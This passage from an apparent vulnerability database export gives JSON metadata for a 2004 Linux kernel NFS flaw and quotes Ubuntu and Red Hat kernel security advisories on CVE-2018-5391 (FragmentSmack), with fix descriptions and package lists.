\nA46xowVq1vMlH2Lib+V/qr3b1hE67nMHjysECVx9Ob4gFuKNoR2eqnAaJvjnAT8J\n/LoUC20EdCHUqn6v+M9t/WZgC+WNR8cq69uDy3YQhDP/nIan6fm2uf2kSV9A7ZxE\nGrwsWl/WX5Q/sQqMWaU6r4az98X3z90/cN+eJJ3vwtA+rm+nxEvyev+jaLuOQBDf\nebh/XA4FZ35xmi+spdiVeJH4F/ubaGlmj7+wDOF3suYAPSXT2QAFEbQlU3VTRSBT\nZWN1cml0eSBUZWFtIDxzZWN1cml0eUBzdXNlLmRlPokBFQMFEDbhLUfkWLKHsco8\nRQEBVw4H/1vIdiOLX/7hdzYaG9crQVIk3QwaB5eBbjvLEMvuCZHiY2COUg5QdmPQ\n8SlWNZ6k4nu1BLcv2g/pymPUWP9fG4tuSnlUJDrWGm3nhyhAC9iudP2u1YQY37Gb\nB6NPVaZiYMnEb4QYFcqv5c/r2ghSXUTYk7etd6SW6WCOpEqizhx1cqDKNZnsI/1X\n11pFcO2N7rc6byDBJ1T+cK+F1Ehan9XBt/shryJmv04nli5CXQMEbiqYYMOu8iaA\n8AWRgXPCWqhyGhcVD3LRhUJXjUOdH4ZiHCXaoF3zVPxpeGKEQY8iBrDeDyB3wHmj\nqY9WCX6cmogGQRgYG6yJqDalLqrDOdmJARUDBRA24S0Ed7LmAD0l09kBAW04B/4p\nWH3f1vQn3i6/+SmDjGzUu2GWGq6Fsdwo2hVM2ym6CILeow/K9JfhdwGvY8LRxWRL\nhn09j2IJ9P7H1Yz3qDf10AX6V7YILHtchKT1dcngCkTLmDgC4rs1iAAl3f089sRG\nBafGPGKv2DQjHfR1LfRtbf0P7c09Tkej1MP8HtQMW9hPkBYeXcwbCjdrVGFOzqx+\nAvvJDdT6a+oyRMTFlvmZ83UV5pgoyimgjhWnM1V4bFBYjPrtWMkdXJSUXbR6Q7Pi\nRZWCzGRzwbaxqpl3rK/YTCphOLwEMB27B4/fcqtBzgoMOiaZA0M5fFoo54KgRIh0\nzinsSx2OrWgvSiLEXXYKiEYEEBECAAYFAjseYcMACgkQnkDjEAAKq6ROVACgjhDM\n/3KM+iFjs5QXsnd4oFPOnbkAnjYGa1J3em+bmV2aiCdYXdOuGn4ZiQCVAwUQN7c7\nwhaQN/7O/JIVAQEB+QP/cYblSAmPXxSFiaHWB+MiUNw8B6ozBLK0QcMQ2YcL6+Vl\nD+nSZP20+Ja2nfiKjnibCv5ss83yXoHkYk2Rsa8foz6Y7tHwuPiccvqnIC/c9Cvz\ndbIsdxpfsi0qWPfvX/jLMpXqqnPjdIZErgxpwujas1n9016PuXA8K3MJwVjCqSKI\nRgQQEQIABgUCOhpCpAAKCRDHUqoysN/3gCt7AJ9adNQMbmA1iSYcbhtgvx9ByLPI\nDgCfZ5Wj+f7cnYpFZI6GkAyyczG09sE=\n=LRKC\n- -----END PGP PUBLIC KEY BLOCK-----\n\n- -- \n -                                                                      -\n| Roman Drahtm\\xfcller      \u003cdraht@suse.de\u003e // \"You don\u0027t need eyes to see, |\n  SUSE Linux AG - Security       Phone: //             you need vision!\"\n| N\\xfcrnberg, Germany     +49-911-740530 //           Maxi Jazz, Faithless |\n -                                                                      -\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niQEVAwUBQOWPL3ey5gA9JdPZAQFFzQf+Mo5WmO40BDHakn4qD5rAcfU6H/0rhMpy\nBi8r+g6GoSp/m2Zy+1O0Qn3jVb/iirVlnHH3DND1r/GunM3c5CTaMYt2Bt7PTOdt\nOsjD41lbiFlHDmmmaodROQvcrz7T67YU0gCtSKJdDfs2ATiiUOcyUQZNfi/PiEqD\njwmKpP5c1NXSXPSwZ2f430itJA5iUqqVBeB1WHn63kOnIKtHBJ9c6uw3rZ99t1OA\niud3L+VQSycb8xQSlOsuiaYW1S236VsogKWRbqY76eo7E2AnVQlMpcZkyW91/vfT\nWntQlZJAaGFX1q/IyGy+PGFPUoJjNc7H6jy5ZqJqXR5Sb0KrHfadCQ==\n=24bz\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0497"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      },
      {
        "db": "BID",
        "id": "10662"
      },
      {
        "db": "VULHUB",
        "id": "VHN-8927"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      }
    ],
    "trust": 2.07
  },
  "exploit_availability": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-8927",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8927"
      }
    ]
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2004-0497",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "10662",
        "trust": 1.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013",
        "trust": 0.7
      },
      {
        "db": "SUSE",
        "id": "SUSE-SA:2004:020",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:354",
        "trust": 0.6
      },
      {
        "db": "REDHAT",
        "id": "RHSA-2004:360",
        "trust": 0.6
      },
      {
        "db": "CONECTIVA",
        "id": "CLA-2004:852",
        "trust": 0.6
      },
      {
        "db": "MANDRAKE",
        "id": "MDKSA-2004:066",
        "trust": 0.6
      },
      {
        "db": "XF",
        "id": "16599",
        "trust": 0.6
      },
      {
        "db": "OVAL",
        "id": "OVAL:ORG.MITRE.OVAL:DEF:9867",
        "trust": 0.6
      },
      {
        "db": "EXPLOIT-DB",
        "id": "718",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "35495",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-8927",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "33705",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8927"
      },
      {
        "db": "BID",
        "id": "10662"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0497"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ]
  },
  "id": "VAR-200412-0085",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8927"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2023-12-18T11:50:50.358000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "kernel_30",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_30.html"
      },
      {
        "title": "kernel_se20",
        "trust": 0.8,
        "url": "http://www.miraclelinux.com/support/update/data/kernel_se20.html"
      },
      {
        "title": "RHSA-2004:360",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-360.html"
      },
      {
        "title": "RHSA-2004:354",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-354.html"
      },
      {
        "title": "RHSA-2004:327",
        "trust": 0.8,
        "url": "https://rhn.redhat.com/errata/rhsa-2004-327.html"
      },
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "http://www.turbolinux.co.jp/"
      },
      {
        "title": "RHSA-2004:327",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-327j.html"
      },
      {
        "title": "RHSA-2004:360",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-360j.html"
      },
      {
        "title": "RHSA-2004:354",
        "trust": 0.8,
        "url": "http://www.jp.redhat.com/support/errata/rhsa/rhsa-2004-354j.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "NVD-CWE-Other",
        "trust": 1.0
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2004-0497"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "http://www.mandrakesecure.net/en/advisories/advisory.php?name=mdksa-2004:066"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-354.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.redhat.com/support/errata/rhsa-2004-360.html"
      },
      {
        "trust": 1.7,
        "url": "http://www.novell.com/linux/security/advisories/2004_20_kernel.html"
      },
      {
        "trust": 1.6,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026anuncio=000852"
      },
      {
        "trust": 1.1,
        "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9867"
      },
      {
        "trust": 1.1,
        "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/16599"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2004-0497"
      },
      {
        "trust": 0.8,
        "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2004-0497"
      },
      {
        "trust": 0.8,
        "url": "http://www.securityfocus.com/bid/10662"
      },
      {
        "trust": 0.6,
        "url": "http://xforce.iss.net/xforce/xfdb/16599"
      },
      {
        "trust": 0.6,
        "url": "http://oval.mitre.org/repository/data/getdef?id=oval:org.mitre.oval:def:9867"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-327.html"
      },
      {
        "trust": 0.3,
        "url": "http://rhn.redhat.com/errata/rhsa-2004-360.html"
      },
      {
        "trust": 0.1,
        "url": "http://distro.conectiva.com.br/atualizacoes/?id=a\u0026amp;anuncio=000852"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0535"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0497"
      },
      {
        "trust": 0.1,
        "url": "http://www.gnupg.org"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0626"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0495"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2004-0496"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-8927"
      },
      {
        "db": "BID",
        "id": "10662"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0497"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-8927"
      },
      {
        "db": "BID",
        "id": "10662"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      },
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "NVD",
        "id": "CVE-2004-0497"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2004-12-06T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8927"
      },
      {
        "date": "2004-07-05T00:00:00",
        "db": "BID",
        "id": "10662"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      },
      {
        "date": "2004-07-02T12:32:00",
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "date": "2004-12-06T05:00:00",
        "db": "NVD",
        "id": "CVE-2004-0497"
      },
      {
        "date": "2004-07-05T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2017-10-11T00:00:00",
        "db": "VULHUB",
        "id": "VHN-8927"
      },
      {
        "date": "2009-07-12T06:16:00",
        "db": "BID",
        "id": "10662"
      },
      {
        "date": "2007-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      },
      {
        "date": "2017-10-11T01:29:26.777000",
        "db": "NVD",
        "id": "CVE-2004-0497"
      },
      {
        "date": "2005-10-20T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "33705"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Linux Kernel of  NFS On the server  GID Vulnerabilities that can be tampered with",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2004-000261"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "access verification error",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-200412-013"
      }
    ],
    "trust": 0.6
  }
}

var-201809-1153
Vulnerability from variot

The Linux kernel, versions 3.9+, is vulnerable to a denial of service attack with low rates of specially modified packets targeting IP fragment re-assembly. An attacker may cause a denial of service condition by sending specially crafted IP fragments. Various vulnerabilities in IP fragmentation have been discovered and fixed over the years. The current vulnerability (CVE-2018-5391) became exploitable in the Linux kernel with the increase of the IP fragment reassembly queue size. Linux Kernel is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition. 7) - aarch64, noarch, ppc64le

Security Fix(es):

  • An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of Load & Store instructions (a commonly used performance optimization). It relies on the presence of a precisely-defined instruction sequence in the privileged code as well as the fact that memory read from address to which a recent memory write has occurred may see an older value and subsequently cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to read privileged memory by conducting targeted cache side-channel attacks. Maintaining the denial of service condition requires continuous two-way TCP sessions to a reachable open port, thus the attacks cannot be performed using spoofed IP addresses. (CVE-2018-5391)

Space precludes documenting all of the security fixes in this advisory. 1623067 - CVE-2018-9363 kernel: Buffer overflow in hidp_process_report 1629636 - CVE-2018-14641 kernel: a bug in ip_frag_reasm() can cause a crash in ip_do_fragment()

  1. ========================================================================= Ubuntu Security Notice USN-3742-2 August 14, 2018

linux-lts-trusty vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 ESM

Summary:

Several security issues were fixed in the Linux kernel. This update provides the corresponding updates for the Linux Hardware Enablement (HWE) kernel from Ubuntu 14.04 for Ubuntu 12.04 ESM.

It was discovered that memory present in the L1 data cache of an Intel CPU core may be exposed to a malicious process that is executing on the CPU core. This vulnerability is also known as L1 Terminal Fault (L1TF). A local attacker in a guest virtual machine could use this to expose sensitive information (memory from other guests or the host OS). (CVE-2018-3646)

It was discovered that memory present in the L1 data cache of an Intel CPU core may be exposed to a malicious process that is executing on the CPU core. This vulnerability is also known as L1 Terminal Fault (L1TF). A local attacker could use this to expose sensitive information (memory from the kernel or other processes). (CVE-2018-3620)

Andrey Konovalov discovered an out-of-bounds read in the POSIX timers subsystem in the Linux kernel. (CVE-2018-5390)

Juha-Matti Tilli discovered that the IP implementation in the Linux kernel performed algorithmically expensive operations in some situations when handling incoming packet fragments. (CVE-2018-5391)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 ESM: linux-image-3.13.0-155-generic 3.13.0-155.206~precise1 linux-image-3.13.0-155-generic-lpae 3.13.0-155.206~precise1 linux-image-generic-lpae-lts-trusty 3.13.0.155.145 linux-image-generic-lts-trusty 3.13.0.155.145

Please note that the recommended mitigation for CVE-2018-3646 involves updating processor microcode in addition to updating the kernel; however, the kernel includes a fallback for processors that have not received microcode updates.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 6.7) - i386, ppc64, s390x, x86_64

Bug Fix(es):

  • Previously, the kernel source code lacked support to report the Speculative Store Bypass Disable (SSBD) vulnerability status on IBM Power Systems. As a consequence, the /sys/devices/system/cpu/vulnerabilities/spec_store_bypass file incorrectly reported "Not affected". This fix updates the kernel source code to properly report the SSBD status either as "Vulnerable" or "Mitigation: Kernel entry/exit barrier (TYPE)", where TYPE is one of "eieio", "hwsync", "fallback", or "unknown". (BZ#1615873)

  • After updating the system to prevent the L1 Terminal Fault (L1TF) vulnerability, only one thread was detected on systems that offer processing of two threads on a single processor core. With this update, the "__max_smt_threads()" function has been fixed. (BZ#1629634)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

===================================================================== Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2018:3590-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:3590 Issue date: 2018-11-13 CVE Names: CVE-2017-18344 CVE-2018-5391 CVE-2018-10675 CVE-2018-14634 =====================================================================

  1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.2 Advanced Update Support, Red Hat Enterprise Linux 7.2 Telco Extended Update Support, and Red Hat Enterprise Linux 7.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.2) - noarch, x86_64 Red Hat Enterprise Linux Server E4S (v. 7.2) - noarch, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 7.2) - x86_64 Red Hat Enterprise Linux Server Optional E4S (v. 7.2) - x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 7.2) - x86_64 Red Hat Enterprise Linux Server TUS (v. 7.2) - noarch, x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

  • A flaw named FragmentSmack was found in the way the Linux kernel handled reassembly of fragmented IPv4 and IPv6 packets. (CVE-2018-5391)

  • kernel: out-of-bounds access in the show_timer function in kernel/time/posix-timers.c (CVE-2017-18344)

  • kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact (CVE-2018-10675)

  • kernel: Integer overflow in Linux's create_elf_tables function (CVE-2018-14634)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Red Hat would like to thank Juha-Matti Tilli (Aalto University - Department of Communications and Networking and Nokia Bell Labs) for reporting CVE-2018-5391 and Qualys Research Labs for reporting CVE-2018-14634.

Bug Fix(es):

  • Previously, a kernel panic occurred when the kernel tried to make an out of bound access to the array that describes the L1 Terminal Fault (L1TF) mitigation state on systems without Extended Page Tables (EPT) support. This update extends the array of mitigation states to cover all the states, which effectively prevents out of bound array access. Also, this update enables rejecting invalid, irrelevant values, that might be erroneously provided by the userspace. As a result, the kernel no longer panics in the described scenario. (BZ#1629565)

  • Previously, a packet was missing the User Datagram Protocol (UDP) payload checksum during a full checksum computation, if the hardware checksum was not applied. As a consequence, a packet with an incorrect checksum was dropped by a peer. With this update, the kernel includes the UDP payload checksum during the full checksum computation. As a result, the checksum is computed correctly and the packet can be received by the peer. (BZ#1635792)

  • Previously, a transform lookup through the xfrm framework could be performed on an already transformed destination cache entry (dst_entry). When using User Datagram Protocol (UDP) over IPv6 with a connected socket in conjunction with Internet Protocol Security (IPsec) in Encapsulating Security Payload (ESP) transport mode. As a consequence, invalid IPv6 fragments transmitted from the host or the kernel occasionally terminated unexpectedly due to a socket buffer (SKB) underrun. With this update, the xfrm lookup on an already transformed dst_entry is not possible. As a result, using UDP iperf utility over IPv6 ESP no longer causes invalid IPv6 fragment transmissions or a kernel panic. (BZ#1639586)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1575065 - CVE-2018-10675 kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact 1609664 - CVE-2018-5391 kernel: IP fragments with random offsets allow a remote denial of service (FragmentSmack) 1610958 - CVE-2017-18344 kernel: out-of-bounds access in the show_timer function in kernel/time/posix-timers.c 1624498 - CVE-2018-14634 kernel: Integer overflow in Linux's create_elf_tables function

  1. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.2):

Source: kernel-3.10.0-327.76.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.76.1.el7.noarch.rpm kernel-doc-3.10.0-327.76.1.el7.noarch.rpm

x86_64: kernel-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm kernel-devel-3.10.0-327.76.1.el7.x86_64.rpm kernel-headers-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.76.1.el7.x86_64.rpm perf-3.10.0-327.76.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm python-perf-3.10.0-327.76.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.2):

Source: kernel-3.10.0-327.76.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.76.1.el7.noarch.rpm kernel-doc-3.10.0-327.76.1.el7.noarch.rpm

x86_64: kernel-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm kernel-devel-3.10.0-327.76.1.el7.x86_64.rpm kernel-headers-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.76.1.el7.x86_64.rpm perf-3.10.0-327.76.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm python-perf-3.10.0-327.76.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server TUS (v. 7.2):

Source: kernel-3.10.0-327.76.1.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-327.76.1.el7.noarch.rpm kernel-doc-3.10.0-327.76.1.el7.noarch.rpm

x86_64: kernel-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debug-devel-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm kernel-devel-3.10.0-327.76.1.el7.x86_64.rpm kernel-headers-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-libs-3.10.0-327.76.1.el7.x86_64.rpm perf-3.10.0-327.76.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm python-perf-3.10.0-327.76.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional AUS (v. 7.2):

x86_64: kernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.76.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional E4S (v. 7.2):

x86_64: kernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.76.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server Optional TUS (v. 7.2):

x86_64: kernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm kernel-tools-libs-devel-3.10.0-327.76.1.el7.x86_64.rpm perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm python-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/

  1. References:

https://access.redhat.com/security/cve/CVE-2017-18344 https://access.redhat.com/security/cve/CVE-2018-5391 https://access.redhat.com/security/cve/CVE-2018-10675 https://access.redhat.com/security/cve/CVE-2018-14634 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/articles/3553061 https://access.redhat.com/security/vulnerabilities/mutagen-astronomy

  1. Contact:

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/

Copyright 2018 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1

